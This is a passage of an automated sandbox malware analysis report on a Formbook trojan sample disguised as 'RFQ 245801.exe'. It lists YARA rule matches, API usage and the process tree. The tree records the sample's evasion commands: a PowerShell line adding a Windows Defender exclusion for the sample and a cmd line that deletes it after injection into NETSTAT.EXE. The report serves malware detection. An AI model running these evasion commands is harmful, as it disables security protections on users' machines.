          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0318E4F67_2_0318E4F6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319AB407_2_0319AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03196BD77_2_03196BD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030DEA807_2_030DEA80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030F69627_2_030F6962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E29A07_2_030E29A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031AA9A67_2_031AA9A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E28407_2_030E2840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030EA8407_2_030EA840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030C68B87_2_030C68B8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0310E8F07_2_0310E8F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03100F307_2_03100F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03182F307_2_03182F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03122F287_2_03122F28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03154F407_2_03154F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0315EFA07_2_0315EFA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030D2FC87_2_030D2FC8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319EE267_2_0319EE26
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E0E597_2_030E0E59
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319CE937_2_0319CE93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030F2E907_2_030F2E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319EEDB7_2_0319EEDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0317CD1F7_2_0317CD1F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030EAD007_2_030EAD00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030F8DBF7_2_030F8DBF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030DADE07_2_030DADE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E0C007_2_030E0C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03180CB57_2_03180CB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030D0CF27_2_030D0CF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319132D7_2_0319132D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030CD34C7_2_030CD34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0312739A7_2_0312739A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E52A07_2_030E52A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030FB2C07_2_030FB2C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031812ED7_2_031812ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030FD2F07_2_030FD2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031AB16B7_2_031AB16B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0311516C7_2_0311516C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030CF1727_2_030CF172
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030EB1B07_2_030EB1B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E70C07_2_030E70C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0318F0CC7_2_0318F0CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031970E97_2_031970E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319F0E07_2_0319F0E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319F7B07_2_0319F7B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031256307_2_03125630
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031916CC7_2_031916CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031975717_2_03197571
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0317D5B07_2_0317D5B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319F43F7_2_0319F43F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030D14607_2_030D1460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319FB767_2_0319FB76
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030FFB807_2_030FFB80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03155BF07_2_03155BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0311DBF97_2_0311DBF9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319FA497_2_0319FA49
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03197A467_2_03197A46
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03153A6C7_2_03153A6C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03125AA07_2_03125AA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0317DAAC7_2_0317DAAC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03181AA37_2_03181AA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0318DAC67_2_0318DAC6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031759107_2_03175910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E99507_2_030E9950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030FB9507_2_030FB950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0314D8007_2_0314D800
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E38E07_2_030E38E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319FF097_2_0319FF09
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E1F927_2_030E1F92
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319FFB17_2_0319FFB1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E9EB07_2_030E9EB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03191D5A7_2_03191D5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030E3D407_2_030E3D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03197D737_2_03197D73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_030FFDC07_2_030FFDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03159C327_2_03159C32
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_0319FCF27_2_0319FCF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BE7927_2_026BE792
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026A9E607_2_026A9E60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026A9E5B7_2_026A9E5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026A2FB07_2_026A2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026A2D877_2_026A2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026A2D907_2_026A2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEA0367_2_02EEA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEB2327_2_02EEB232
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE5B327_2_02EE5B32
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE5B307_2_02EE5B30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE10827_2_02EE1082
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE89127_2_02EE8912
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEE5CD7_2_02EEE5CD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE2D027_2_02EE2D02
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0315F290 appears 103 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 030CB970 appears 262 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0314EA12 appears 86 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03115130 appears 58 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03127E54 appears 102 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 017AF290 appears 103 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 01777E54 appears 107 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 0179EA12 appears 86 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 0171B970 appears 262 times
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: String function: 01765130 appears 58 times
          Source: RFQ 245801.exeStatic PE information: invalid certificate
          Source: RFQ 245801.exe, 00000000.00000002.1744400565.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ 245801.exe
          Source: RFQ 245801.exe, 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
          Source: RFQ 245801.exe, 00000000.00000000.1688427062.00000000006CC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
          Source: RFQ 245801.exe, 00000000.00000002.1753756214.00000000072B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ 245801.exe
          Source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
          Source: RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs RFQ 245801.exe
          Source: RFQ 245801.exe, 00000005.00000002.1799833129.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 245801.exe
          Source: RFQ 245801.exeBinary or memory string: OriginalFilenameUsAH.exe, vs RFQ 245801.exe
          Source: RFQ 245801.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: RFQ 245801.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, GwxhdMvE70alVQgO2H.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, ykvgwsy2sp0Dxo7e19.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.RFQ 245801.exe.3c61910.2.raw.unpack, ykvgwsy2sp0Dxo7e19.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@13/6@11/1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00641CFC GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,7_2_00641CFC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00641C89 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,7_2_00641C89
          Source: C:\Users\user\Desktop\RFQ 245801.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 245801.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
          Source: C:\Users\user\Desktop\RFQ 245801.exeMutant created: \Sessions\1\BaseNamedObjects\WIAEYG
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpfsdf0.kdq.ps1Jump to behavior
          Source: RFQ 245801.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: RFQ 245801.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
          Source: C:\Users\user\Desktop\RFQ 245801.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: RFQ 245801.exeReversingLabs: Detection: 44%
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: cryptsp.dllJump to behavior
